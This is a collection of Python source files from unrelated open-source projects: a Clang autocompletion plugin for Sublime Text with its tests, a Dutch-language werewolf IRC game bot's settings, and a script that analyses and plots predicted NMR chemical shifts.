db_search_scope = TreeSearchScope(from_folder=db_file.folder)
flags = db.get_flags(file_path, db_search_scope)
return flags
@staticmethod
def unique_folder_name(cmake_path):
"""Get unique build folder name.
Args:
cmake_path (str): Path to CMakeLists of this project.
Returns:
str: Path to a unique temp folder.
"""
unique_proj_str = Tools.get_unique_str(cmake_path)
tempdir = path.join(
Tools.get_temp_dir(), 'cmake_builds', unique_proj_str)
return tempdir
@staticmethod
def __compile_cmake(cmake_file, cmake_binary, prefix_paths, flags,
target_compilers):
"""Compile cmake given a CMakeLists.txt file.
This returns a new compilation database path to further parse the
generated flags. The build is performed in a temporary folder with a
unique folder name for the project being built - a hex number
generated from the pull path to current CMakeListst.txt file.
Args:
cmake_file (tools.file): file object for CMakeLists.txt file
prefix_paths (str[]): paths to add to CMAKE_PREFIX_PATH before
running `cmake`
flags (str[]): flags to pass to cmake
target_compilers(dict): Compilers to use
"""
if not cmake_file or not cmake_file.loaded():
return None
if not prefix_paths:
prefix_paths = []
if not flags:
flags = []
cmake_cmd = [cmake_binary, '-DCMAKE_EXPORT_COMPILE_COMMANDS=ON'] \
+ flags + [cmake_file.folder]
tempdir = CMakeFile.unique_folder_name(cmake_file.full_path)
try:
os.makedirs(tempdir)
except OSError:
log.debug("Folder %s exists.", tempdir)
# sometimes there are variables missing to carry out the build. We
# can set them here from the settings.
my_env = os.environ.copy()
log.debug("prefix paths: %s", prefix_paths)
merged_paths = ""
for prefix_path in prefix_paths:
merged_paths += prefix_path + ":"
merged_paths = merged_paths[:-1]
log.debug("merged paths: %s", merged_paths)
my_env['CMAKE_PREFIX_PATH'] = merged_paths
log.debug("CMAKE_PREFIX_PATH: %s", my_env['CMAKE_PREFIX_PATH'])
# If target compilers are set, create a toolchain file to force
# cmake using them:
c_compiler = target_compilers.get(Tools.LANG_C_TAG, None)
cpp_compiler = target_compilers.get(Tools.LANG_CPP_TAG, None)
# Note: CMake does not let us explicitly set Objective-C/C++ compilers.
# Hence, we only set ones for C/C++ and let it derive the rest.
if c_compiler is not None or cpp_compiler is not None:
toolchain_file_path = path.join(tempdir, "ECC-Toolchain.cmake")
with open(toolchain_file_path, "w") as file:
file.write("include(CMakeForceCompiler)\n")
if c_compiler is not None:
file.write(
"set(CMAKE_C_COMPILER {})\n".format(c_compiler))
if cpp_compiler is not None:
file.write(
"set(CMAKE_CPP_COMPILER {})\n".format(cpp_compiler))
cmake_cmd += ["-DCMAKE_TOOLCHAIN_FILE={}".format(
toolchain_file_path)]
log.debug(' running command: %s', cmake_cmd)
output_text = Tools.run_command(
command=cmake_cmd, cwd=tempdir, env=my_env)
log.debug("cmake produced output: \n%s", output_text)
database_path = path.join(tempdir, CompilationDb._FILE_NAME)
if not path.exists(database_path):
log.error("cmake has finished, but no compilation database.")
return None
# update the dependency modification time
dep_file_path = path.join(tempdir, 'CMakeFiles', 'Makefile.cmake')
if path.exists(dep_file_path):
for dep_path in CMakeFile.__get_cmake_deps(dep_file_path):
File.update_mod_time(dep_path)
return File(database_path)
@staticmethod
def __get_cmake_deps(deps_file):
"""Parse dependencies from Makefile.cmake.
Args:
deps_file (str): Full path to Makefile.cmake file.
Returns:
str[]: List of full paths to dependency files.
"""
folder = path.dirname(path.dirname(deps_file))
deps = []
with open(deps_file, 'r') as f:
content = f.read()
found = CMakeFile._DEP_REGEX.findall(content)
for dep in found:
if not path.isabs(dep):
dep = path.join(folder, dep)
deps.append(dep)
return deps
@staticmethod
def __need_cmake_rerun(cmake_path):
tempdir = CMakeFile.unique_folder_name(cmake_path)
if not path.exists(tempdir):
# temp folder not there. We need to run cmake to generate one.
return True
dep_file_path = path.join(tempdir, 'CMakeFiles', 'Makefile.cmake')
if not path.exists(dep_file_path):
# no file that manages dependencies, we need to run cmake.
return True
# now check if the deps actually changed since we last saw them
for dep_file in CMakeFile.__get_cmake_deps(dep_file_path):
if not path.exists(dep_file):
return True
if not File.is_unchanged(dep_file):
return True
return False
```
#### File: plugin/utils/module_reloader.py
```python
import sys
import imp
import logging
from ..tools import PKG_NAME
log = logging.getLogger("ECC")
class ModuleReloader:
"""Reloader for all dependencies."""
MAX_RELOAD_TRIES = 10
@staticmethod
def reload_all(ignore_string='singleton'):
"""Reload all loaded modules."""
prefix = PKG_NAME + '.plugin.'
# reload all twice to make sure all dependencies are satisfied
log.debug(
"Reloading modules that start with '%s' and don't contain '%s'",
prefix, ignore_string)
log.debug("Reload all modules first time")
ModuleReloader.reload_once(prefix, ignore_string)
log.debug("Reload all modules second time")
ModuleReloader.reload_once(prefix, ignore_string)
log.debug("All modules reloaded")
@staticmethod
def reload_once(prefix, ignore_string):
"""Reload all modules once."""
try_counter = 0
try:
for name, module in sys.modules.items():
if name.startswith(prefix) and ignore_string not in name:
log.debug("Reloading module: '%s'", name)
imp.reload(module)
except OSError as e:
if try_counter >= ModuleReloader.MAX_RELOAD_TRIES:
log.fatal("Too many tries to reload and no success. Fail.")
return
try_counter += 1
log.error("Received an error: %s on try %s. Try again.",
e, try_counter)
ModuleReloader.reload_once(prefix, ignore_string)
```
#### File: plugin/utils/progress_status.py
```python
import sublime
MSG_CHARS_MOON = u'🌑🌒🌓🌔🌕🌖🌗🌘'
MSG_READY_MOON = u'✔'
MSG_CHARS_COLOR_SUBLIME = u'⣾⣽⣻⢿⡿⣟⣯⣷'
MSG_READY_COLOR_SUBLIME = ' READY '
class BaseProgressStatus(object):
"""A base class for progress status."""
MSG_TAG = '000_ECC'
MSG_MASK = 'ECC: [{}]'
def __init__(self):
"""Initialize progress status."""
self.showing = False
self.msg_chars = None
self.msg_ready = None
@staticmethod
def set_status(message):
"""Set status message for the current view."""
view = sublime.active_window().active_view()
view.set_status(BaseProgressStatus.MSG_TAG, message)
def erase_status(self):
"""Erase status message for the current view."""
self.showing = False
view = sublime.active_window().active_view()
view.erase_status(BaseProgressStatus.MSG_TAG)
def show_ready_message(self):
"""Show ready message."""
if not self.showing:
return
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(self.msg_ready))
def show_next_message(self):
"""Abstract method. Generate next message."""
raise NotImplementedError("abstract method is called")
class MoonProgressStatus(BaseProgressStatus):
"""Progress status that shows phases of the moon."""
def __init__(self):
"""Init moon progress status."""
super().__init__()
self.idx = 0
self.msg_chars = MSG_CHARS_MOON
self.msg_ready = MSG_READY_MOON
def show_next_message(self):
"""Show next moon phase message."""
if not self.showing:
return
chars = self.msg_chars
mod = len(chars)
self.idx = (self.idx + 1) % mod
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(chars[self.idx]))
class ColorSublimeProgressStatus(BaseProgressStatus):
"""Progress status that shows phases of the moon."""
def __init__(self):
"""Init color sublime like progress status."""
super().__init__()
self.msg_chars = MSG_CHARS_COLOR_SUBLIME
self.msg_ready = MSG_READY_COLOR_SUBLIME
def show_next_message(self):
"""Show next random progress message."""
if not self.showing:
return
from random import sample
mod = len(self.msg_chars)
rands = [self.msg_chars[x % mod] for x in sample(range(100), 10)]
BaseProgressStatus.set_status(
BaseProgressStatus.MSG_MASK.format(''.join(rands)))
class NoneSublimeProgressStatus(BaseProgressStatus):
"""Progress status that does nothing."""
def __init__(self):
"""Init color sublime like progress status."""
super().__init__()
self.showing = False
def show_ready_message(self):
"""Empty implementation."""
pass
def show_next_message(self):
"""Empty implementation."""
pass
```
#### File: plugin/utils/search_scope.py
```python
from os import path
ROOT_PATH = path.abspath('/')
class TreeSearchScope:
"""Encapsulation of a search scope to search up the tree."""
def __init__(self,
from_folder=ROOT_PATH,
to_folder=ROOT_PATH):
"""Initialize the search scope."""
self.from_folder = from_folder
self.to_folder = to_folder
@property
def from_folder(self):
"""Get the starting folder."""
return self._from_folder
@from_folder.setter
def from_folder(self, folder):
"""Set the last folder in search."""
self._from_folder = folder
self._current_folder = self._from_folder
@property
def to_folder(self):
"""Get the end of search folder."""
return self._to_folder
@to_folder.setter
def to_folder(self, folder):
"""Set the last folder in search."""
self._to_folder = folder
self._one_past_last = path.dirname(self._to_folder)
def __bool__(self):
"""Check if the search scope is empty."""
return self.from_folder != ROOT_PATH
def __iter__(self):
"""Make this an iterator."""
self._current_folder = self._from_folder
return self
def __next__(self):
"""Get next folder to search in."""
current_folder = self._current_folder
self._current_folder = path.dirname(self._current_folder)
scope_end_reached = current_folder == self._one_past_last
root_reached = current_folder == self._current_folder
if root_reached or scope_end_reached:
raise StopIteration
else:
return current_folder
def __repr__(self):
"""Return search scope as a printable string."""
return 'SearchScope: from_folder: {}, to_folder: {}'.format(
self._from_folder, self._to_folder)
class ListSearchScope:
"""Encapsulation of a search scope to search in a list."""
def __init__(self, paths=[]):
"""Initialize the search scope."""
self.folders = paths
@property
def folders(self):
"""Get the starting folder."""
return self._folders
@folders.setter
def folders(self, paths):
"""Set the folders."""
self._folders = [f for f in paths if path.isdir(f)]
self._iter = iter(self._folders)
def __bool__(self):
"""Check if the search scope is not empty."""
return len(self._folders) > 0
def __iter__(self):
"""Make this an iterator."""
self._iter = iter(self._folders)
return self._iter
def __next__(self):
"""Get next folder to search in."""
return next(self._iter)
def __repr__(self):
"""Return search scope as a printable string."""
return 'SearchScope: folders: {}'.format(self._folders)
```
#### File: EasyClangComplete/tests/test_CppProperties.py
```python
import imp
from os import path, environ
from unittest import TestCase
from EasyClangComplete.plugin.flags_sources import CppProperties
from EasyClangComplete.plugin import tools
from EasyClangComplete.plugin.utils import flag
from EasyClangComplete.plugin.utils import search_scope
imp.reload(CppProperties)
imp.reload(tools)
imp.reload(flag)
imp.reload(search_scope)
CppProperties = CppProperties.CppProperties
SearchScope = search_scope.TreeSearchScope
Flag = flag.Flag
def _get_test_folder(name):
return path.join(path.dirname(__file__), 'CppProperties_files', name)
class TestCppProperties(TestCase):
"""Test generating flags with a 'CppProperties.json' file."""
def test_get_all_flags(self):
"""Test if CppProperties.json is found."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = [
Flag('-I', path.normpath('/folder/include/path')),
Flag('-I', path.normpath('/another/file/path')),
]
scope = SearchScope(from_folder=_get_test_folder('simple'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
def test_expand_environment_variables(self):
"""Test environment variables are expanded."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
environ['TEST_VARIABLE_TO_EXPAND'] = '/lib_include_dir'
expected = [
Flag('-I', path.normpath('/lib_include_dir')),
]
scope = SearchScope(from_folder=_get_test_folder('environment'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
def test_no_db_in_folder(self):
"""Test if no json is found."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = None
self.assertEqual(expected, db.get_flags(
path.normpath('/home/user/dummy_main.cpp')))
def test_empty_include_and_defines(self):
"""Test that empty fields are handled correctly."""
include_prefixes = ['-I']
db = CppProperties(include_prefixes)
expected = []
scope = SearchScope(from_folder=_get_test_folder('empty'))
self.assertEqual(expected, db.get_flags(search_scope=scope))
```
#### File: EasyClangComplete/tests/test_docs.py
```python
from os import path
from unittest import TestCase
def parse_code_headers(md_file_path):
"""Parse all settings names from the markdown."""
import re
all_settings_headers_regex = re.compile(r"###\s\*\*`(\w+)`\*\*.*")
with open(md_file_path) as f:
contents = f.read()
matches = all_settings_headers_regex.findall(contents)
return matches
def parse_settings(json_file_path):
"""Parse all settings names from the json file."""
import re
all_settings_regex = re.compile(r'^ "(\w+)"\s*:.+$', flags=re.MULTILINE)
with open(json_file_path) as f:
contents = f.read()
matches = all_settings_regex.findall(contents)
return matches
class TestSomething(TestCase):
"""Test that the settings have descriptions in the docs."""
def test_all_settings(self):
"""Test that all settings have docs."""
project_folder = path.dirname(path.dirname(__file__))
md_file = path.join(project_folder, 'docs', 'settings.md')
settings_file = path.join(
project_folder, 'EasyClangComplete.sublime-settings')
self.assertEqual(set(parse_code_headers(md_file)),
set(parse_settings(settings_file)))
```
#### File: EasyClangComplete/tests/test_search_scope.py
```python
import imp
from os import path
from unittest import TestCase
from EasyClangComplete.plugin.utils import search_scope
imp.reload(search_scope)
TreeSearchScope = search_scope.TreeSearchScope
ListSearchScope = search_scope.ListSearchScope
class test_search_scope(TestCase):
"""Testing file related stuff."""
def test_init_tree(self):
"""Test if we can init a search path from tree."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertEqual(current_folder, scope.from_folder)
self.assertEqual(parent_folder, scope.to_folder)
def test_init_tree_partial(self):
"""Test if we can init a search path from tree."""
current_folder = path.dirname(path.abspath(__file__))
scope = TreeSearchScope(from_folder=current_folder)
self.assertTrue(scope)
self.assertEqual(current_folder, scope.from_folder)
self.assertEqual(scope.to_folder, search_scope.ROOT_PATH)
def test_iterate_tree(self):
"""Test that we can iterate a tree."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_iterate_tree_twice(self):
"""Test that we can iterate tree twice."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = TreeSearchScope(from_folder=current_folder,
to_folder=parent_folder)
self.assertTrue(scope)
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
self.assertIs(scope, iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_init_list(self):
"""Test if we can init a search path from list."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertEqual(current_folder, scope.folders[0])
self.assertEqual(parent_folder, scope.folders[1])
def test_iterate_list(self):
"""Test that we can iterate a list."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_iterate_list_twice(self):
"""Test that we can iterate the tree twice."""
current_folder = path.dirname(path.abspath(__file__))
parent_folder = path.dirname(current_folder)
scope = ListSearchScope([current_folder, parent_folder])
self.assertTrue(scope)
self.assertIsNotNone(iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
self.assertIsNotNone(iter(scope))
self.assertEqual(current_folder, next(scope))
self.assertEqual(parent_folder, next(scope))
try:
next(scope)
self.fail("Did not throw StopIteration")
except StopIteration:
pass
def test_init_empty_tree(self):
"""Test that empty tree returns false."""
scope = TreeSearchScope()
self.assertFalse(scope)
def test_init_empty_list(self):
"""Test that empty list returns false."""
scope = ListSearchScope()
self.assertFalse(scope)
```
#### File: EasyClangComplete/tests/test_unique_list.py
```python
from unittest import TestCase
from EasyClangComplete.plugin.utils.unique_list import UniqueList
class test_unique_list(TestCase):
"""Test unique list."""
def test_init(self):
"""Test initialization."""
unique_list = UniqueList()
self.assertEqual([], unique_list.as_list())
self.assertEqual("[]", str(unique_list))
unique_list = UniqueList([1, 2, 3])
self.assertEqual([1, 2, 3], unique_list.as_list())
self.assertEqual("[1, 2, 3]", str(unique_list))
def test_append(self):
"""Test appending single values to unique list."""
unique_list = UniqueList()
unique_list.append(1)
self.assertEqual([1], unique_list.as_list())
unique_list.append(3)
self.assertEqual([1, 3], unique_list.as_list())
unique_list.append(1)
self.assertEqual([1, 3], unique_list.as_list())
unique_list.append(2)
self.assertEqual([1, 3, 2], unique_list.as_list())
def test_clear(self):
"""Test clearing the list."""
unique_list = UniqueList([1, 2, 3])
self.assertEqual([1, 2, 3], unique_list.as_list())
unique_list.clear()
self.assertEqual([], unique_list.as_list())
def test_iterable(self):
"""Test iterating over values."""
unique_list = UniqueList([0, 1, 2])
counter = 0
for i in unique_list:
self.assertEqual(i, counter)
counter += 1
def test_add(self):
"""Test merging with other iterable."""
unique_list = UniqueList([1, 2, 3])
other_list = [1, 4, 2, 5]
unique_list += other_list
self.assertEqual([1, 2, 3, 4, 5], unique_list.as_list())
```
|
{
"source": "Jeebeevee/wolfbot",
"score": 2
}
|
#### File: wolfbot/settings/wolfgame.py
```python
PING_WAIT = 300 # Seconds
PING_MIN_WAIT = 30
MINIMUM_WAIT = 60
EXTRA_WAIT = 20
MAXIMUM_WAITED = 2 # limit for amount of !wait's
STATS_RATE_LIMIT = 15
VOTES_RATE_LIMIT = 15
ADMINS_RATE_LIMIT = 300
SHOTS_MULTIPLIER = .12 # ceil(shots_multiplier * len_players) = bullets given
MAX_PLAYERS = 30
DRUNK_SHOTS_MULTIPLIER = 3
NIGHT_TIME_LIMIT = 120
NIGHT_TIME_WARN = 0 # should be less than NIGHT_TIME_LIMIT
DAY_TIME_LIMIT_WARN = 780
DAY_TIME_LIMIT_CHANGE = 120 # seconds after DAY_TIME_LIMIT_WARN has passed
KILL_IDLE_TIME = 300
WARN_IDLE_TIME = 180
PART_GRACE_TIME = 7
QUIT_GRACE_TIME = 30
MAX_PRIVMSG_TARGETS = 1
LOG_FILENAME = ""
BARE_LOG_FILENAME = ""
# HIT MISS SUICIDE
GUN_CHANCES = ( 5/7 , 1/7 , 1/7 )
DRUNK_GUN_CHANCES = ( 2/7 , 4/7 , 1/7 )
MANSLAUGHTER_CHANCE = 1/5 # ACCIDENTAL HEADSHOT (FATAL)
GUNNER_KILLS_WOLF_AT_NIGHT_CHANCE = 0
GUARDIAN_ANGEL_DIES_CHANCE = 1/2
rechercheur_REVEALED_CHANCE = 2/5
#################################################################################################################
# ROLE INDEX: PLAYERS SEER WOLF CURSED DRUNK HARLOT TRAITOR GUNNER CROW ANGEL rechercheur ##
#################################################################################################################
ROLES_GUIDE = { 4 : ( 1 , 1 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ), ##
6 : ( 1 , 1 , 1 , 1 , 0 , 0 , 0 , 0 , 0 , 0 ), ##
8 : ( 1 , 2 , 1 , 1 , 1 , 0 , 0 , 0 , 0 , 0 ), ##
10 : ( 1 , 2 , 1 , 1 , 1 , 1 , 1 , 0 , 0 , 0 ), ##
11 : ( 1 , 2 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 0 ), ##
15 : ( 1 , 3 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
22 : ( 1 , 4 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
29 : ( 1 , 5 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 1 ), ##
None : ( 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 )} ##
#################################################################################################################
# Notes: ##
#################################################################################################################
GAME_MODES = {}
AWAY = [] # cloaks of people who are away.
SIMPLE_NOTIFY = [] # cloaks of people who !simple, who want everything /notice'd
ROLE_INDICES = {0 : "ziener",
1 : "wolf",
2 : "vervloekte burger",
3 : "dronken burger",
4 : "onschuldige meisje",
5 : "verrader",
6 : "kanonnier",
7 : "weerkraai",
8 : "bescherm engel",
9 : "rechercheur"}
INDEX_OF_ROLE = dict((v,k) for k,v in ROLE_INDICES.items())
NO_VICTIMS_MESSAGES = ("Het lichaam van een jonge huisdier is gevonden.",
"Een plas van bloed en wolfpoot afdrukken zijn gevonden.",
"Een pluk van wolvenhaar is gevonden.")
LYNCH_MESSAGES = ("De burgers hebben, na lang overleg, besloten te elmineren \u0002{0}\u0002, hij/zij was een... \u0002{1}\u0002.",
"Onder veel lawaai, de woedende burgers elimineren \u0002{0}\u0002, hij/zij was een... \u0002{1}\u0002.",
"De menigte sleept een protesterende \u0002{0}\u0002 naar de galg. Hij/zij bezwijkt aan de wil van de groep, en wordt opgehangen. Hij/zij was een \u0002{1}\u0002.",
"Verslagen door zijn/haar lot, is \u0002{0}\u0002 naar de galg geleid. Na de dood bleek hij/zij een \u0002{1}\u0002 te zijn.")
import botconfig
RULES = (botconfig.CHANNEL + " Kanaal regels: 1) Wees aardig voor elkaar. 2) Deel geen spel infomatie "+
"na je dood. 3) Bots zijn niet toegestaan. 4) Speel niet met clones van jezelf.\n"+
"5) Stop niet met spelen, tenzij het niet anders kan. 6) Niet vloeken en hou het leuk "+
"voor iedereen. 7) Sla geen Prive berichten over van het spel tijdens het spel. "+
"8) Gebruik je gezonde verstand. 9) Wachten op timeouts is niet leuk.")
# Other settings:
START_WITH_DAY = False
WOLF_STEALS_GUN = False # at night, the wolf can steal steal the victim's bullets
OPT_IN_PING = False # instead of !away/!back, users can opt-in to be pinged
PING_IN = [] # cloaks of users who have opted in for ping
is_role = lambda plyr, rol: rol in ROLES and plyr in ROLES[rol]
def plural(role):
if role == "wolf": return "wolven"
elif role == "persoon": return "personen"
else: return role + "s"
def list_players():
pl = []
for x in ROLES.values():
pl.extend(x)
return pl
def list_players_and_roles():
plr = {}
for x in ROLES.keys():
for p in ROLES[x]:
plr[p] = x
return plr
get_role = lambda plyr: list_players_and_roles()[plyr]
def del_player(pname):
prole = get_role(pname)
ROLES[prole].remove(pname)
class InvalidModeException(Exception): pass
def game_mode(name):
def decor(c):
GAME_MODES[name] = c
return c
return decor
CHANGEABLE_ROLES = { "zieners" : INDEX_OF_ROLE["ziener"],
"wolven" : INDEX_OF_ROLE["wolf"],
"vervloekten" : INDEX_OF_ROLE["vervloekte burger"],
"dronkaarts" : INDEX_OF_ROLE["dronken burger"],
"onschuldige meisjes" : INDEX_OF_ROLE["onschuldige meisje"],
"verraders" : INDEX_OF_ROLE["verrader"],
"kanonniers" : INDEX_OF_ROLE["kanonnier"],
"weerkraaien" : INDEX_OF_ROLE["weerkraai"],
"engelen" : INDEX_OF_ROLE["bescherm engel"],
"rechercheurs" : INDEX_OF_ROLE["rechercheur"]}
# TODO: implement game modes
@game_mode("roles")
class ChangedRolesMode(object):
"""Example: !fgame roles=wolves:1,seers:0,angels:1"""
def __init__(self, arg):
self.ROLES_GUIDE = ROLES_GUIDE.copy()
lx = list(ROLES_GUIDE[None])
pairs = arg.split(",")
pl = list_players()
if not pairs:
raise InvalidModeException("Invalid syntax for mode roles.")
for pair in pairs:
change = pair.split(":")
if len(change) != 2:
raise InvalidModeException("Invalid syntax for mode roles.")
role, num = change
try:
num = int(num)
try:
lx[CHANGEABLE_ROLES[role.lower()]] = num
except KeyError:
raise InvalidModeException(("De rol \u0002{0}\u0002 "+
"is niet geldig.").format(role))
except ValueError:
raise InvalidModeException("A bad value was used in mode roles.")
for k in ROLES_GUIDE.keys():
self.ROLES_GUIDE[k] = tuple(lx)
# Persistence
# Load saved settings
import sqlite3
import os
conn = sqlite3.connect("data.sqlite3", check_same_thread = False)
with conn:
c = conn.cursor()
c.execute('CREATE TABLE IF NOT EXISTS away (nick TEXT)') # whoops, i mean cloak, not nick
c.execute('CREATE TABLE IF NOT EXISTS simple_role_notify (cloak TEXT)') # people who understand each role
c.execute('SELECT * FROM away')
for row in c:
AWAY.append(row[0])
c.execute('SELECT * FROM simple_role_notify')
for row in c:
SIMPLE_NOTIFY.append(row[0])
# populate the roles table
c.execute('DROP TABLE IF EXISTS roles')
c.execute('CREATE TABLE roles (id INTEGER PRIMARY KEY AUTOINCREMENT, role TEXT)')
for x in ["burger"]+list(ROLE_INDICES.values()):
c.execute("INSERT OR REPLACE INTO roles (role) VALUES (?)", (x,))
c.execute(('CREATE TABLE IF NOT EXISTS rolestats (player TEXT, role TEXT, '+
'teamwins SMALLINT, individualwins SMALLINT, totalgames SMALLINT, '+
'UNIQUE(player, role))'))
if OPT_IN_PING:
c.execute('CREATE TABLE IF NOT EXISTS ping (cloak text)')
c.execute('SELECT * FROM ping')
for row in c:
PING_IN.append(row[0])
def remove_away(clk):
with conn:
c.execute('DELETE from away where nick=?', (clk,))
def add_away(clk):
with conn:
c.execute('INSERT into away VALUES (?)', (clk,))
def remove_simple_rolemsg(clk):
with conn:
c.execute('DELETE from simple_role_notify where cloak=?', (clk,))
def add_simple_rolemsg(clk):
with conn:
c.execute('INSERT into simple_role_notify VALUES (?)', (clk,))
def remove_ping(clk):
with conn:
c.execute('DELETE from ping where cloak=?', (clk,))
def add_ping(clk):
with conn:
c.execute('INSERT into ping VALUES (?)', (clk,))
def update_role_stats(acc, role, won, iwon):
with conn:
wins, iwins, totalgames = 0, 0, 0
c.execute(("SELECT teamwins, individualwins, totalgames FROM rolestats "+
"WHERE player=? AND role=?"), (acc, role))
row = c.fetchone()
if row:
wins, iwins, total = row
else:
wins, iwins, total = 0,0,0
if won:
wins += 1
if iwon:
iwins += 1
total += 1
c.execute("INSERT OR REPLACE INTO rolestats VALUES (?,?,?,?,?)",
(acc, role, wins, iwins, total))
```
|
{
"source": "jeeberhardt/shift",
"score": 2
}
|
#### File: shift/scripts/analyze.py
```python
import os
import re
import sys
import argparse
import h5py
import numpy as np
import pandas as pd
from Bio.SeqUtils import seq3
from matplotlib import pyplot as plt
__author__ = "<NAME>"
__copyright__ = "Copyright 2016, <NAME>"
__lience__ = "MIT"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
def get_obs(obs_file):
return pd.read_csv(obs_file, delim_whitespace=True, usecols=[1,2,3,5],
names=['resid', 'resn', 'atom_type', 'obs'])
def get_random_coil(rc_file):
rc = pd.read_csv(rc_file, usecols=[1,2,3], names=['resn', 'atom_type', 'rc'])
rc['resn'] = rc['resn'].apply(seq3).str.upper()
return rc
def get_pred(hdf_file, atom_types, start=0, stop=-1):
columns = ['resid', 'resn', 'atom_type', 'pred', 'std']
df = pd.DataFrame(np.nan, index=[0], columns=columns)
with h5py.File(hdf_file, 'r') as f:
i = 0
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
resn = str(residue[0].split('_')[1])
for atom_type in atom_types:
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
if stop == -1:
dset = f[nset][start:]
else:
dset = f[nset][start:stop]
df.loc[i] = [resid, resn, atom_type, np.nanmean(dset), np.nanstd(dset)]
i += 1
except KeyError:
pass
return df
def rmsd(x, y):
diff = x - y
diff = diff.dropna()
return np.sqrt(np.sum(diff**2)/(float(diff.shape[0])))
def extract_dssp_info(dssp_file, sectype='H', shift = 0):
start_read = False
list_sec = []
i = 0
with open(dssp_file) as f:
for line in f:
if ' # RESIDUE' in line:
start_read = True
if start_read and not "#" in line:
resnum = int(line[6:10].strip()) + shift
secstr = str(line[16])
if sectype == secstr:
i += 1
else:
if i: list_sec.append((resnum-i, i))
i = 0
return list_sec
def plot_dssp_info(ax, resid, min_data, max_data, dssp_file, baseline=None):
range_data = max_data - min_data
if baseline != None:
y_min = baseline - (range_data / 10.)
else:
y_min = min_data - (range_data / 10.)
y_bar = y_min + (np.abs(min_data - y_min) / 2.)
y_box = y_bar + (np.abs(y_bar - y_min) / 2.)
y_len = 2. * (y_bar - y_box)
ax.broken_barh(extract_dssp_info(dssp_file, 'H'), (y_box, y_len), facecolors='SteelBlue', zorder=3)
ax.broken_barh(extract_dssp_info(dssp_file, 'E'), (y_box, y_len), facecolors='Gold', zorder=3)
ax.plot(resid, len(resid)*[y_bar], color='black', zorder=1, lw=0.5)
def plot_shift(cs, dssp_file=None):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
xmin = cs['resid'].min()
xmax = cs['resid'].max()
label = {'CA': 'C_{\\alpha}', 'CB': 'C_{\\beta}'}
for atom_type in atom_types:
if label.has_key(atom_type):
ylabel = label[atom_type]
else:
ylabel = atom_type
fig, ax = plt.subplots(figsize=(12, 4))
tmp = cs.loc[cs['atom_type'] == atom_type]
ax.axhline(linewidth=1, color='Gainsboro')
ax.plot(tmp['resid'], tmp['dpred'], linestyle='-', marker='.', color=color)
ax.plot(tmp['resid'], tmp['dobs'], linestyle='-', marker='.', color='black')
std_neg = tmp['dpred'] - tmp['std']
std_pos = tmp['dpred'] + tmp['std']
ax.fill_between(tmp['resid'], std_neg, std_pos, color=color, alpha=0.4)
ymax = np.max(np.abs(tmp['dobs'])) * 1.5
ymin = -ymax
if dssp_file:
plot_dssp_info(ax, tmp['resid'], ymin / 1.5, ymax, dssp_file)
ax.set_xlabel("Residue", fontsize=20)
ax.set_ylabel(r"$\Delta\delta %s$ (ppm)" % ylabel, fontsize=20)
ax.set_xlim(xmin - 1, xmax + 1)
ax.set_ylim(ymin, ymax)
plt.savefig("shift_%s.png" % atom_type, dpi=300, format='png', bbox_inches='tight')
plt.close(fig)
def plot_distribution(cs, hdf_file):
color = 'chocolate'
atom_types = cs['atom_type'].unique()
with h5py.File(hdf_file, 'r') as f:
for atom_type in atom_types:
out_dir = 'shift_distribution/%s' % atom_type
os.makedirs(out_dir)
cols = 10
num = cs['atom_type'].value_counts()[atom_type]
rows = int(num / cols) + (num % cols > 0)
figB, axB = plt.subplots(rows, cols, figsize=(35, 45), sharex=True, sharey=True)
icol, irow = 0, 0
xmax = 0
# We want the global xmax !
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
resn = str(residue[0].split('_')[1])
try:
nset = '%s_%s/%s' % (resid, resn, atom_type)
dset = f[nset]
row = cs[(cs['resid'] == resid) & (cs['resn'] == resn) & (cs['atom_type'] == atom_type)]
x = dset - row['rc'].values[0]
xmax = np.nanmax([xmax, np.nanmax(np.abs(x)), np.abs(row['dobs']).values[0]])
except KeyError:
pass
xmax *= 1.5
for residue in f.iteritems():
resid = int(residue[0].split('_')[0])
